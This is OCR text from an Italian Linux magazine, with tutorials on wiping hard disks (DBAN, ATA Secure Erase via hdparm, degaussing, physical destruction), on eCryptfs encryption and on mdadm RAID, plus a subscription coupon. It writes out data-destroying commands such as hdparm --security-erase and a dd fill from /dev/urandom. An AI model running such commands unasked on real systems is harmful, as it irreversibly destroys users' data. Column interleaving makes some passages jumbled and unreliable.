Se non avete disco a qualcun altro. In questo tutorial, quindi, vi mostriamo
paura di rischiare, come impiegare voi stessi gli ultimi quattro metodi della
le varianti di
Fedora e Ubuntu
tabella (ipotizziamo che siate in grado di usare shred da soli).
dispongono del Una piccola avvertenza: non provate le tecniche qui spiegate
tool hdparm sul disco fisso del vostro PC. Gli strumenti che abbiamo
che può essere usato hanno la capacità di rendere illeggibile l’unità di
installato
memoria. Quindi, se volete provare voi stessi, usate un
rispettivamente
con yum e apt-get. secondo computer con un hard disk che può essere
sacrificato in nome dell’apprendimento.
50
Metodo Tipo di sanificazione Risultato del
ripristino
comando rm Sotto il minimo 3 file leggibili
comando format Sotto il minimo 3 file leggibili
comando shred Eliminazione: solo singoli file 0 file leggibili
DBAN Eliminazione: la più lenta 0 file leggibili
Secure Erase Eliminazione: la più veloce 0 file leggibili
Degaussing Eliminazione: hardware 0 file leggibili
specializzato
Distruzione Distruzione 0 file leggibili
Cancellare con DBAN
DBAN (Darik’s Boot And Nuke, http://dban.org)
è un’applicazione distribuita da Blancco. L’immagine
ISO del CD, gratuita, fornita dal produttore è pensata
per l’utente domestico che deve cancellare il suo disco
fisso, ma l’azienda ha anche un prodotto con licenza
commerciale per le applicazioni in ambito lavorativo.
Questo tool è una raccolta di algoritmi di cancellazione
e di configurazioni che l’utente seleziona per ripulire
il contenuto del disco indicato. Quando lo si esegue,
questo software cancella il disco fisso con un insieme
casuale di dati preselezionati. Il processo sovrascrive
i dati relativi ai file, al filesystem e tutte le locazioni
indirizzabili dell’unità a disco. Il suo obiettivo è di
rimpiazzare tutti i dati con informazioni casuali
generati da un algoritmo. DBAN può essere impiegato
solo su dischi funzionanti, cioè drive identificati dal
BIOS e in buono stato di funzionamento. Scaricate
DBAN 2.8.8 beta dal sito del produttore e masterizzate
l’ISO su un CD. Quando il software finisce il boot,
scegliete la voce DBAN dall’elenco.
A questo punto potete selezionare il disco su cui
operare; per fare delle modifiche alle impostazioni
potete usare le scorciatoie da tastiera indicate in basso
nello schermo. Selezionate il disco su cui volete
operare e poi premete F10 per iniziare le operazioni.
La sezione Statistics si riempirà quindi effettivamente
man mano che il programma procede. Ci può voler
parecchio tempo prima che DBAN finisca, perché
questo tool deve generare e poi scrivere i dati casuali
in ogni bit del disco.

Procedura di test
Prima di sottoporre il nostro hard disk ai differenti
metodi di “pulitura”, lo abbiamo preparato usando una
procedura standard. Per prima cosa, abbiamo rimosso
tutti i dati presenti usando il software RCMP TSSIT
OPS-II presente nel CD di DBAN. Questo metodo è stato
deprecato dal governo canadese e rimpiazzato da CSEC
ITSG-06, un metodo che sfrutta il Secure Erase. Dopo
che i dati sono stati cancellati, abbiamo partizionato
il drive (usando fdisk), lo abbiamo formattato in ext3
(usando mkfs.ext3) e abbiamo copiato file di nove tipi
diversi (DOC, DOCX, EPUB, JPG, PNG, ODS, ODT, TXT
e ZIP), assicurandoci che fossero leggibili. Dopo aver
completato ogni metodo di cancellazione, abbiamo
messo all’opera il tool di recovery PhotoRec per cercare
di recuperare i file.
Usare Secure Erase
In alternativa a DBAN, i dischi costruiti dopo il 2001
dispongono di un firmware che prevede la sanificazione
dei dati senza dover ricorrere a software esterni. Un
disco ATA identificato dal BIOS può essere cancellato in
modo sicuro richiamando il comando Secure Erase da
terminale. Ogni comando digitato verrà subito eseguito
sul disco. Durante il processo, l’hard disk può bloccarsi,
rendendolo inaccessibile al sistema operativo.
Durante i nostri test ci è successo proprio questo, non
intenzionalmente, e il disco è divenuto inutilizzabile
(ma fortunatamente siamo riusciti a rimediare usando
il comando per definire la password di sicurezza). Per
questa ragione, i rischi associati al facile accesso al
Secure Erase possono essere mitigati usando un
sistema operativo specifico a solo scopo di
sperimentazione: qualcosa come SystemRescueCD
(www.sysresccd.org), che contiene il set di comandi
Secure Erase. L’immagine di questa distro contiene una
raccolta di tool per amministrare e ripristinare un
sistema Linux o Windows. Il software si avvia da CD/
DVD o da chiavetta USB e non richiede l’installazione
su disco fisso; un menu al boot consente all’utente
di scegliere se operare da riga di comando o via
interfaccia grafica. Il sito del progetto contiene
un’abbondante documentazione che spiega come
creare un CD/DVD o un un’unità USB avviabili. Dopo
il boot, avendo scelto la versione grafica, avete accesso,
con i privilegi di root, a un sistema operativo Linux
completo e alle applicazioni a corredo. Se la macchina
è collegata a una rete, il processo di avvio richiederà un
indirizzo IP al DHCP della rete per collegarsi alla rete
stessa e a Internet. Nei prossimi comandi che
indicheremo, vedrete due parametri: X e #. X è l’ID
del device. Questa informazione la potete trovare da
un’applicazione come GParted oppure leggendo
l’output di dmesg. #, invece, è il numero dell’host.
Vedrete più avanti cosa intendiamo. Aprite un terminale
e invocate il tool hdparm nel modo seguente:
hdparm -I /dev/sdX
Nell’output dovreste vedere qualcosa del genere:
Security:
Master password revision code = 65534
Eliminare i file
I comandi di preparazione alla distruzione dei dati!
supported
not enabled
not locked
frozen
not expired: security count
supported: enhanced erase
I parametri not frozen, not locked ed enabled devono
risultare così sul disco per poter procedere con un
Secure Erase. Il wiki che trovate all’URL http://bit.ly/
SecureErase include le spiegazioni del perché le
condizioni di messa in opera possono esistere e come
correggere la situazione. Nei nostri test siamo riusciti
a stabilire il parametro not frozen con un procedimento
segnalato da Edoardo Liverani (http://bit.ly/
Liverani), quindi lo andiamo a spiegare qui. Una nota:
il sistema e i dischi che abbiamo usato per questo
esperimento supportavano l’hot swap (cioè avremmo
potuto rimuovere i dischi a computer acceso). Di solito,
però, è una pessima idea rimuovere o sostituire dei
componenti standard “a caldo”. Per prima cosa dovete
determinare l’host number:
ls -ld /sys/block/sdX
Nell’output che appare, cercate una stringa simile
a host5. Questo è il numero dell’host che vi serve.
Scollegate il drive e spegnete il computer (ricordate
quello che abbiamo detto sul non scollegare i dischi
a PC acceso). Ora digitate:
echo 1 > /sys/block/sdX/device/delete
Ricollegate l’unità a disco e scrivete
echo “- - -”> /sys/class/scsi_host/host#/scan
Controllate lo stato del drive con hdparm per
assicurarvi che il parametro not frozen sia attivo. Per
procedere con il Secure Erase, il prossimo parametro
di sicurezza da cambiare è enabled. Per abilitare la
51
 Dischi e Dati
sicurezza sul disco digitate il comando seguente:
Tip hdparm --user-master u --security-set-pass sean /dev/sdX
Potete usare la password che volete al posto di sean.
La documentazione Per riportare il disco allo stato not enabled usate
sul Secure Erase hdparm --user-master u --security-disable sean
vi avvisa più volte /dev/sdX
sui rischi di questa
operazione. Alcuni
Per rimuovere l’opzione locked:
dei comandi hdparm --user-master u --security-unlock sean /dev/
richiedono sdX
addirittura Ora potete inizializzare il Secure Erase così:
il parametro
hdparm --user-master u --security-erase sean /dev/sdX
--i-know-
what-i-am-doing Prima di far tornare il disco in servizio, assicuratevi
(so cosa sto che i parametri not enabled, not locked e not frozen
facendo) per essere siano di nuovo attivi, altrimenti il sistema operativo
completati. non riuscirà ad accedere al disco.
Demagnetizzazione e distruzione
Passiamo agli ultimi due metodi. Sottoporre un disco
a un degausser o alla distruzione fisica tramite
polverizzazione e triturazione renderà, cosa ovvia,
inutilizzabili i vostri dati, ma anche l’hard disk stesso.
Ma funzionano veramente questi metodi? Gli hard disk
contengono piatti in alluminio-magnesio o vetro pirex
rivestiti di ossido di ferro. Su ogni piatto scorre una
testina azionata da un dispositivo a bobina chiamato
attuatore. Quando questa bobina riceve dei segnali
elettrici, la testina magnetizza la superficie del piatto.
I dati vengono registrati sui piatti come una serie di 0
e 1 magnetici. Un degausser per hard disk è un
dispositivo elettronico che genera un intenso campo
magnetico. Questo campo resetta (cancella) il disco
così che non sia più possibile usarlo. Piazzare un hard
disk dentro il campo magnetico di un degausser
scombussola tutte le informazioni magnetiche
contenute sui piatti. Noi abbiamo usato un degausser
Garner HD-3WXL per sanificare il nostro disco (potete
vedere un video d’esempio all’URL http://bit.ly/
Degausser). L’elettronica interna di questo dispositivo
carica dei condensatori per immagazzinare l’energia,
come quando si carica una batteria. Quando poi questi
condensatori vengono fatti scaricare attraverso
speciali bobine presenti nel device, viene prodotto un
grande impulso elettromagnetico (EMP). Il campo
magnetico così generato è talmente intenso da riuscire
a orientare in modo casuale il materiale magnetico
presente sui piatti del disco. L’EMP prodotto da questi
degausser non è poi così dissimile da quello generato
da una esplosione nucleare. Il processo di
demagnetizzazione non rimuove solo i dati dell’utente,
ma anche altre informazioni memorizzate nei piatti in
fase di costruzione, rendendo del tutto inservibile
l’unità. Dopo l’operazione di degaussing abbiamo
provato a inserire il disco nel computer: il BIOS lo ha
individuato, ma poi ha fallito l’analisi riportando la
presenza di un errore nel drive o nel suo firmware
prima di continuare con il boot.

Misure estreme
L’ultimo metodo che abbiamo applicato è la distruzione
fisica dell’hard disk. Questo vuol dire fare a pezzi i piatti
del drive così da rendere fisicamente impossibile la
lettura dei dati. Questo può essere fatto con trituratori
meccanici o un frantumatore meccanico. La società
Security Engineered Machinery, che crea strumenti di
Il Terminator questo tipo, ha messo online alcuni video interessanti,
della pulizia dei come questo: http://bit.ly/1BY3LvD. Se non avete
dati: l’HD-3WXL a disposizione un trituratore (un oggetto non certo
Data Eliminator economico), potete usare un trapano elettrico per fare
dei buchi sui piatti o per graffiarne la superficie.
Qualcuno suggerisce che anche il semplice piegare

DBAN e UNetbootin i piatti li rende illeggibili. Eppure alcune teorie indicano

Se preferite usare UNetbootin in una
distro Linux per far avviare DBAN da
una chiave USB, dovete modificare
alcuni file affinché ciò funzioni.
Di default, con DBAN, l’unità USB
avviabile creata da UNetbootin va
in stallo e genera un errore relativo
al RAM disk, il che in realtà è una cosa
positiva, perché la configurazione
di default creata da UNetbootin
prevede un’opzione che distrugge
i dati dell’hard disk senza neanche
chiedere conferma all’utente.
Sul suo blog (http://bit.ly/
UNetbootinBugs), Alex Pounds
fornisce un rimedio, che riassumiamo
qui di seguito.
Nel file syslinux.cfg presente nella
chiavetta USB creata con UNetbootin
fate le modifiche seguenti:
rimpiazzate tutte le occorrenze di
ubninit con ISOLINUX.BIN;
rimpiazzate tutte le occorrenze di
ubnkern con DBAN.BZI;
cancellate --autonuke dalla sezione
marcata con label
unetbootindefault.
Ricordate che le varie voci sono case
sensitive e non dimenticate di salvare
i cambiamenti.
che le organizzazioni governative hanno a disposizione
delle tecnologie in grado di recuperare i dati a meno
che i piatti non siano totalmente distrutti. Cercando un
po’ in Rete siamo incappati anche in qualcuno che si è
divertito a sparare con un fucile (sì, esatto… sparare)
a un disco fisso, ma non crediamo sia una cosa da fare.
Oppure potreste usare una mazza da baseball come
nel film Impiegati… male! (trovate il trailer all’URL
http://bit.ly/RgOoZ9, guardate circa al minuto 1 e
52), ma non siamo convinti che sia un metodo efficace.
In definitiva, cari amministratori di sistema, dopo aver
letto questo articolo avete a disposizione un discreto
set di metodi per la distruzione dei dati personali
presenti sugli hard disk, per fare in modo che non
finiscano in mani sbagliate. Speriamo che vi siano utili
in caso di bisogno.

52
ABBONATI SUBITO!
l
de

5 45,
% 90€ invece
sconto 80€ di 70,
3 a
1 um
12
n
o
nn eri
Manuale coMPleto

Potrebbero
Il sIstema operatIvo pIù elegante dI WIndoWs e mac os

Installa subIto Fedora a 32 o 64 bIt

FunzIona sempre, non sI blocca maI! dì addIo aI vIrus

tutte le app gratuIte che vuoI, preInstallate o da scarIcare quando vuoI

sI Installa velocemente e senza problemI

interessarti Passa a Fedora senza

farti mancare nulla
di quello che Mac oS e
Windows hanno

anche: IL SISTEMA OPERATIVO

Virtualizza senza
limiti grazie
a docker!

STABILE, ELEGANTE
E PERFETTO PER OGNI USO

VERSIONE
PerFetta
per i
VERSIONI A 32 E 64 BIT
ProFeSSioniSti

copertina manuale fedora.indd 1 05/12/2016 16:17

DIGITALE IN App journal Linux Pro Distro 2 - Fedora

€ 49,49 sconto del 30% € 9,90 su www.sprea.it
OMAGGIO!
Sei già abbonato? Rinnova ora! Per te c’è uno SCONTO del 40% (3 numeri omaggio)

Perché abbonarsi: COUPON DI ABBONAMENTO

• Prezzo della rivista bloccato per un anno
• Sicurezza di ricevere tutti i numeri Sì! Mi abbono a Linux Pro
Tagliare lungo la linea tratteggiata - Puoi anche fotocopiarlo per non rovinare la rivista

Riceverò 12 numeri a soli 45,90 euro anziché 70,80 euro con lo sconto del 35%

SCEGLI il metodo più ❏ Inviate Linux Pro al mio indirizzo:

Cognome e Nome
comodo PER ABBONARTI:
Via N.
chiamaci e attiveremo insieme
Località
il tuo abbonamento CAP Prov.
•TELEFONA al N. 02 87168197
Tel. email
Dal lunedì al venerdì dalle ore 9,00 alle 13,00 e dalle 14,00 ❏ Scelgo di pagare così:
alle 18,00. Il costo massimo della telefonata da linea fissa Con bonifico IBAN IT40H0760101600000091540716- intestato a Sprea Spa
è pari a una normale chiamata su rete nazionale in Italia. Con il bollettino intestato a Sprea S.p.A. via Torino 51, 20063 Cernusco S/Naviglio (MI)
conto postale N° 000091540716
•ONLINE www.linuxpro.it/abbonamenti
Con carta di credito: Visa American Express Diners Mastercard
•FAX invia il coupon al N. 02 56561221 Numero
•POSTA Ritaglia o fotocopia il coupon seguendo le Codice di tre cifre che appare
istruzioni a lato e inviacelo insieme alla copia della ricevuta di Scad. (mm/aa) sul retro della carta di credito
pagamento via fax o mail (abbonamenti@linuxpro.it). Firma
• Contattaci via Skype/WhatsApp ❏ Regalo Linux Pro (quindi non speditelo al mio indirizzo sopra) a:
3206126518 Cognome e Nome
abbonamenti.sprea valido solo per i messaggi Via N.
Località CAP Prov.
Informativa ex Art.13 LGS 196/2003. I suoi dati saranno trattati da Sprea SpA, nonché dalle società con essa in rapporto
di controllo e collegamento ai sensi dell’art. 2359 c.c. titolari del trattamento, per dare corso alla sua richiesta di abbona- Tel. email
mento. A tale scopo, è indispensabile il conferimento dei dati anagrafici. Inoltre previo suo consenso i suoi dati potranno
essere trattati dalle Titolari per le seguenti finalità: 1) Finalità di indagini di mercato e analisi di tipo statistico anche al
fine di migliorare la qualità dei servizi erogati, marketing, attività promozionali, offerte commerciali anche nell’interesse
Il beneficiario del tuo abbonamento riceverà una mail dove gli verrà comunicato il regalo
di terzi. 2) Finalità connesse alla comunicazione dei suoi dati personali a soggetti operanti nei settori editoriale, largo
consumo e distribuzione, vendita a distanza, arredamento, telecomunicazioni, farmaceutico, finanziario, assicurativo,
automobilistico e ad enti pubblici ed Onlus, per propri utilizzi aventi le medesime finalità di cui al suddetto punto 1) e Compila, ritaglia e invia questo coupon in busta chiusa a:
2). Per tutte le finalità menzionate è necessario il suo esplicito consenso. Responsabile del trattamento è Sprea SpA via
Torino 51 20063 Cernusco SN (MI). I suoi dati saranno resi disponibili alle seguenti categorie di incaricati che li tratteran- Sprea Spa - Servizio abbonamenti - Via Torino 51, 20063 Cernusco Sul Naviglio (MI)
no per i suddetti fini: addetti al customer service, addetti alle attività di marketing, addetti al confezionamento. L’elenco
aggiornato delle società del gruppo Sprea SpA, delle altre aziende a cui saranno comunicati i suoi dati e dei responsabili
potrà in qualsiasi momento essere richiesto al numero +39 0287168197 “Customer Service”. Lei può in ogni momento
oppure invialo via mail
e gratuitamente esercitare i diritti previsti dall’articolo 7 del D.Lgs.196/03 – e cioè conoscere quali dei suoi dati vengono Accetto di ricevere offerte promozionali e di contribuire Accetto che i miei dati vengano comunicati
SLP 18

trattati, farli integrare, modificare o cancellare per violazione di legge, o opporsi al loro trattamento – scrivendo a Sprea con i miei dati a migliorare i servizi offerti (come specificato a soggetti terzi (come indicato al punto 2
SpA via Torino 51 20063 Cernusco SN (MI).
al punto 1 dell’informativa privacy): ❏ SI ❏ NO dell’informativa privacy): ❏ SI ❏ NO

OFFERTA VALIDA SOLO PER L’ITALIA

 Dischi e Dati
Protezione totale
per i dischi
Vi spieghiamo come tenere i vostri preziosi file al riparo da occhi indiscreti,
perfino dagli altri utenti del vostro computer
D
a un po’ di tempo, dopo le rivelazioni di Edward
Snowden, l’attenzione alla sicurezza dei dati
memorizzati nei sistemi informatici è notevolmente
aumentata. GNU/Linux e il mondo del Free Software offrono
diverse soluzioni, per esempio cryptsetup che server per la
cifratura di intere partizioni usando il sottosistema dm-crypt
del kernel. Questo metodo (che abbiamo già spiegato in
passato) è in grado di cifrare intere unità a blocchi, di solito
una partizione di un disco. Tale soluzione è ottimale per la
protezione del sistema nel suo complesso, ma rende disponibili
tutti i file dopo che si è eseguito il boot. Ci sarebbe anche
TrueCrypt, che funziona sia con interi device che con dischi
virtuali (un grosso file che si comporta come un disco fisso).
Anche in questo caso, in passato, ne abbiamo parlato spesso,
ma nel 2014 il progetto è stato abbandonato per problemi con
il suo livello di sicurezza; anche se ne sono nati un paio di fork,
molte persone usano ancora la versione 7.1a (la versione 7.2
consentiva solo di vedere i volumi cifrati con TrueCrypt).
Essendo un progetto non più attivo, comunque, ne
sconsigliamo l’uso. Un’altra via è quella di far gestire la cifratura
al filesystem, come fa ZFS sui sistemi Sun, ma nessuno dei
filesystem “classici” di Linux prevede questo metodo.
Signore e signori: eCryptfs
Il sistema che vedrete in queste pagine è differente e prevede
l’uso di un filesystem montato sopra un altro (stacked
Ecco come filesystem), mentre cryptsetup, citato prima, implementa un
appaiono i nomi layer virtuale cifrato su un dispositivo a blocchi, il tutto posto
dei file dopo sotto il filesystem. Visto che eCryptfs funziona sopra a un
essere stati
normale filesystem, non è obbligatorio usarlo su un’intera
cifrati. Anche
il loro contenuto
partizione, ma può essere applicato a directory individuali.
è illeggibile
Questo è il metodo adottato da Ubuntu per cifrare la directory
54
home dell’utente, se si sceglie la cifratura del disco durante
l’installazione. Ma è più facile usare un esempio per spiegare
come funziona. Anche il filesystem eCryptfs è contenuto nel
kernel Linux, e per usarlo è necessario installare il pacchetto
ecryptfs-utils. Create due cartelle chiamate crypt e plain, poi
impostate la directory cifrata con il comando seguente:
sudo mount.ecryptfs crypt plain
Il sistema vi farà diverse domande: ovviamente dovete
scegliere una password che sia sicura ma anche non
impossibile da memorizzare (oppure registratela in un posto
sicuro). Alla maggior parte delle altre domande potete
rispondere accettando i valori di default, tranne alla domanda
Enable Filename Encryption che potreste voler impostare
a yes. Ora copiate alcuni file nella cartella plain e subito dopo
guardate dentro crypt. Vedrete dei file con lo stesso nome,
se non avete attivato la cifratura dei nomi dei file. Ma questa
volta il loro contenuto è criptato. Se non ci credete, provate
a visualizzarne il contenuto. Ora smontate il tutto con
sudo umount plain
La versione leggibile dei file sparisce, lasciando solo quella
cifrata. Rilanciate il comando mount di prima, e plain tornerà
visibile. Questo esempio è semplice e anche un po’ scomodo
volendolo usare spesso, ma spiega bene il funzionamento del
sistema. Il filesystem che avete montato su plain è virtuale,
esiste solo in memoria; gli unici file scritti sul disco sono quelli
in crypt e sono cifrati. Una volta che smontate la directory
plain, i dati che contiene sono protetti e non sono più accessibili
a meno che non rimontiate il filesystem, operazione che
richiede la password che avete scelto.
Cifratura semplificata
Esiste un metodo più semplice e automatizzato per impostare
una directory cifrata senza ricorrere a sudo o dover rispondere
a qualche domanda. Eseguite il comando seguente come
utente normale:
ecryptfs-setup-private
Questo comando vi chiederà la vostra password che usate al
login e poi una passphrase per la directory cifrata. La prima è
usata per bloccare la seconda, che potete anche lasciare vuota,
ci penserà ecryptfs a generarne una in automatico. Verranno
create tre cartelle: .Private che contiene i dati cifrati; Private
che è il punto di mount per i file decifrati; .ecryptfs in cui sono
memorizzati i file usati per montare la vostra directory. Poiché
anche la passphrase è cifrata, dovreste farne una copia e
 Dati al sicuro

Pro e contro di eCryptfs

ECryptfs ha diversi vantaggi rispetto all’uso
di LUKS/dm-crypt:
Backup nel cloud – Visto che la cifratura
avviene a livello di file, potete fare una copia della
vostra cartella .Private su cloud o disco USB
senza dovervi preoccupare che i vostri documenti
vengano letti da altri. Assicuratevi solo di fare una
copia di .ecryptfs.
Sicurezza multi-utente – eCryptfs può
cifrare directory differenti per utenti diversi.
Directory – eCryptfs può essere impiegato
anche sulle cartelle di sistema e sullo swap,
usando una corretta voce in fstab, ma in questo
caso vi chiederà l’inserimento della passphrase.
Login per la lettura – I dati dell’utente sono
leggibili solo quando l’utente è loggato e anche
in questo caso eCryptfs li rende leggibili solo a lui
(e a root) e non agli altri utenti del sistema.
Molti file – Gestire directory con molti file
è un’operazione lenta, anche se il processo può
essere velocizzato evitando di cifrare anche i nomi
dei file.
Aumento delle dimensioni – Visto che ogni
file viene cifrato singolarmente, la dimensione
di ogni file cresce, il che può essere significativo
trovandosi di fronte a tanti file piccoli, come le
email o la cache del browser.
Non è cross-platform – eCryptfs funziona
solo con Linux, poiché usa funzionalità del kernel,
ma questo può non essere un problema.

metterla al sicuro da qualche parte, per esempio una chiave

USB che però non dovete tenere vicino al vostro PC:
ecryptfs-unwrap-passphrase ~/.ecryptfs/wrapped-
passphrase>/da qualcheparte/sicura/ecryptfs_passphrase
Ora potete montare e smontare i vostri dati privati con
i comandi seguenti, oppure usare l’icona creata sul desktop:
ecryptfs-mount-private
ecryptfs-umount-private
Vi ritrovate con una singola cartella cifrata all’interno della
vostra home, ma cosa fare se si volesse qualcosa di più?
Per esempio, ipotizziamo che vogliate cifrare le cartelle
Documenti e Immagini ma non Musica e Video (perché
perdere tempo decifrando file che non contengono nulla
di privato?). La risposta è semplice: spostate all’interno
di Private le cartelle che volete proteggere e poi create dei link
simbolici nella loro posizione originale, così:
mv Documenti Private
ln -s Private/Documenti Documenti
Assicuratevi che Private sia montata quando fate questa
operazione: in questo modo i vostri file saranno disponibili solo
quando il filesystem eCryptfs è montato; quando non lo è,
seguire il link simbolico porterà solo a un errore.
Tutto in automatico
Come detto, dovete usare la vostra password per sbloccare la
passphrase di eCryptfs e quindi montare il filesystem (potete
usare l’opzione -w con ecryptfs-setup-private per impostare
una password diversa da quella del login). Potreste però
chiedervi come mai dovete digitare la vostra password per
sbloccare le cartelle cifrate se l’avete appena inserita al login.
La domanda è lecita: la vostra identificazione all’accesso
significa che conoscete la password. Volendo, quindi, potete
fare in modo che la vostra cartella Private venga montata
in automatico quando vi identificate per poi essere smontata,
sempre automaticamente, quando fate il logout. Questa magia
è permessa da PAM. Come root, inserite la linea seguente
in /etc/pam.d/common-auth:
auth required pam_ecryptfs.so unwrap
e quest’altra in /etc/pam.d/common-session:
session optional pam_ecryptfs.so unwrap
Ora PAM monterà la vostra directory cifrata al login.
Ciò non succederà se avete attivato l’autologin, perché ciò
vanificherebbe tutto il discorso sulla sicurezza, ovviamente.
Cifrare l’intera home
Se tutto ciò che vi abbiamo detto finora vi sembra noto,
è probabile che abbiate usato (o stiate usando) la funzione
Se la vostra
di cifratura della directory home in Ubuntu (o in una delle sue distro non
derivate). Ubuntu, difatti, usa proprio eCryptfs, ma questa è permette il
una funzione standard del kernel e non è limitata a una distro login come root,
(anche ChromeOS usa eCryptfs, per esempio). Ubuntu non dovete creare
imposta una cartella Private quando l’installate, ma cifra l’intera un nuovo utente
home. Ma come fare se usate una distro diversa o se avete già con privilegi
installato Ubuntu e non volete ripetere l’installazione solo per d’amministratore
(e senza login
proteggere la home? In apparenza è semplice, si fa tutto con
automatico) per
un singolo comando, ma l’operazione nasconde qualche
poter cifrare la
problema. Non dovete avere alcun file in uso dentro home, vostra home
il che vuol dire che non dovete aver fatto il login, e avete
bisogno di uno spazio libero pari a due volte e mezzo la
dimensione corrente della home per eseguire il processo
di conversione. Quindi fate il login con un altro utente che abbia
i diritti d’amministratore ed eseguite
sudo ecryptfs-migrate-home --user <ilvostronomeutente>
Terminato il processo, tornate a fare il login con il vostro utente
normale prima di riavviare il PC per completare il setup
e assicurarvi che sia tutto a posto. Dopo aver verificato che
i vostri file sono leggibili, potete cancellare i file originali, non
cifrati, che si trovano ancora in /home/utente.alcune_
stringhe_casuali. Badate bene al fatto che cancellare questa
cartella non rimuove i vostri dati non cifrati dal disco fisso, ma
solo il loro riferimento nella tabella delle directory. Per essere
del tutto certi che siano illeggibili, dovreste sovrascrivere tutto
lo spazio non usato con dei dati casuali, per esempio così:
dd if=/dev/urandom of=unfile bs=4k
rm unfile
Questi comandi creano un file con dati casuali che riempie
il disco e poi lo cancellano liberando lo spazio. Che usiate
ecryptfs-setup-private o ecryptfs-migrate-home, dovreste
utilizzare ecryptfs-unwrap-passphrase per salvare la
passphrase altrimenti non potrete più accedere ai dati qualora
la cartella .ecryptfs dovesse danneggiarsi o perdersi.

55
 Dischi e Dati
RAID: creare
e gestire array
Dribblate i pericoli di perdere dati impostando volumi multipli
e imparando come affrontare eventuali problemi
U
una tecnologia usata per gestire il
partizionamento quando sono coinvolti diversi
dischi è il RAID (Redundant Array of Inexpensive
Disks). Questo combina più dischi in un singolo dispositivo
a blocchi per aumentare la capacità o la ridondanza in
caso di fallimento. La forma più semplice di RAID sono due
dischi in quello che viene chiamato un array RAID1. In
questo caso i due dischi sono cloni uno dell’altro. Tutte le
scritture avvengono su entrambi i dischi (il buffering si
assicura che non impatti sulle performance) mentre le
letture vengono fatte dal disco che riesce a servire i dati
più velocemente. Questo significa che ottenete un piccolo
miglioramento nelle performance di lettura, nessuna
differenza sensibile in scrittura e la stessa capacità di un
solo disco, aumentando però la sicurezza dei dati. Dal
momento che tutto viene scritto in entrambi i dischi, se
uno fallisce i vostri dati sono ancora disponibili nell’altro.
Non solo, ma quando togliete il disco difettoso e lo
sostituite con uno nuovo, i dati vengono automaticamente
copiati in background così da riguadagnare la sicurezza di
due copie il più velocemente possibile.
56
Usare mdadm --detail vi fornisce molte informazioni
riguardo un array, mentre /proc/mdstat è meno prolisso
Tipi di RAID
Ci sono diversi livelli di RAID che descrivono il modo in cui
i dati sono divisi tra i vari dischi (leggete Livelli RAID in
breve). Ci sono anche tre modi diversi per implementare
il RAID: hardware, software e FakeRAID. Il RAID hardware,
come implica il nome, è implementato interamente in
hardware, tramite una scheda controller o sulla scheda
madre di alcuni sistemi server. Non conta quanti dischi
colleghiate a un RAID hardware, il sistema operativo
ne mostrerà sempre e solo uno. Il RAID hardware è veloce
ma ha due svantaggi: è costoso e usa il proprio formato
disco. Ciò significa che se il vostro controller fallisce dovrete
trovarne uno compatibile in sostituzione per leggere
i vostri dischi. Il RAID software fa tutto in software
ed è implementato nel kernel di Linux. Con hardware
moderno, le performance sono paragonabili al RAID
hardware, ma è molto più flessibile nel controllo che offre
e nella capacità di leggere dischi su sistemi diversi. Questo
è quello che vedrete qui. Se la vostra scheda madre dice
di supportare RAID ma non costa centinaia di euro,
probabilmente implementerà il cosiddetto hardware assisted
software RAID o fakeRAID. Il controller ha una funzionalità
RAID appena sufficiente per caricare un driver dai dischi,
quindi diventa software RAID. Solitamente funziona solo
con Windows. È stato fatto più volte riferimento ai dischi,
ma il RAID software può funzionare con qualsiasi dispositivo
a blocchi, e spesso è implementato a livello partizione e non
 Gestire volumi multipli

Livelli RAID in breve

Ci sono diversi modi di combinare i dischi per
formare un array RAI, ognuno dei quali ha i propri
vantaggi e svantaggi. In queste descrizioni, N fa
riferimento al numero di dispositivi nell’array e S è la
dimensione di ognuno. I livelli usati in genere sono:
RAID 0: non è un vero e proprio RAID, dal
momento che collega semplicemente più dischi
insieme. Per questo, meglio LVM. Nessuna
tolleranza all’errore. La dimensione totale è N * S.
RAID 1: due o più dischi con tutti i dati riportati
su tutti i dischi. Tollera errori su N - 1 dischi, la
dimensione totale è S.
RAID 5: un RAID di tre o più dischi con dati
e informazioni di parità distribuite così che ogni
singolo disco possa fallire senza perdere dati.
La dimensione totale è (N - 1) * S.
RAID 6: quattro o più dischi con dati e
informazioni di parità distribuite così da permettere
il fallimento di due dischi qualsiasi senza perdita
di dati. La dimensione totale è (N - 2) * S.
RAID 10: un array RAID 1 di array RAID 0 che
richiede almeno quattro dischi. Tollera fallimenti
multipli finché nessuna sezione RAID 1 perde tutti
i suoi drive. Lo spazio totale è (N / 2) * S.

disco. Passate subito a provare la creazione di un RAID 1 Il RAID

su /dev/sda3 e /dev/sdb3, adattando ovviamente
i dispositivi al vostro sistema. Dovrebbero essere partizioni
sciolte, oppure potete usare file immagini. Dal momento che
state lavorando con file dispositivo in /dev dovrete essere
root, quindi aprite un terminale come root o prefissate ogni
comando con sudo. Il comando principale per lavorare con
dispositivi software RAID è mdadm.
$ mdadm --create /dev/md0 --level=raid1 --raid-devices=2 /
dev/sda3 /dev/sdb3
Se volete risparmiare nelle digitazioni, potete usare:
$ mdadm -C /dev/md0 -l 1 -n 2 /dev/sd{a,b}3
ma qui verranno usate le opzioni lunghe per chiarezza.
Ora avete creato un dispositivo a blocchi su /dev/md0
(i dispositivi software RAID sono generalmente denominati
/dev/mdN) che potete formattare e montare come qualsiasi
altro dispositivo a blocchi
$ mkfs.ext4 /dev/md0
$ mount /dev/md0 /mnt/somewhere
Quando le cose vanno male
Se tutto va come deve, questa è la sola operazione che vi
servirà: il vostro array è stato creato e verrà usato come
normale disco dall’OS, ma se avete un errore sul disco?
Potete vedere lo stato dei vostri array RAI in qualsiasi
momento con questi comandi:
$ cat /proc/mdstat
$ mdadm --detail /dev/md0
Se avete, per esempio, un fallimento nel secondo disco
e avete un rimpiazzo disponibile, togliete il vecchio disco
dall’array con
$ mdadm /dev/md0 --fail /dev/sdb3 --remove /dev/sdb3
quindi spegnete il computer, sostituite il disco ed effettuate
un reboot. L’array funzionerà ancora ma /proc/mdstat
lo mostrerà come degradato, dal momento che manca un
dispositivo. Ora lanciate $ mdadm /dev/md0 --add /dev/sdb3
e controllate nuovamente /proc/mdstat. Mostrerà che
l’array è tornato a due dischi e che sta già sincronizzando
i dati nel nuovo. Potete continuare a usare il computer, anche
se può esserci una caduta nelle performance del disco finché
sta sincronizzando. Se avete un disco che non viene più visto,
come nel caso di un fallimento completo, non potete
rimuovere /dev/sdb3 perché non esiste più, quindi potete
usare la parola chiave missing al posto del nome del disco
e mdadm rimuoverà ogni disco che non riesce a trovare.
Se avete già un disco libero nel vostro computer, per
esempio in /dev/sdc, potete aggiungerlo all’array come
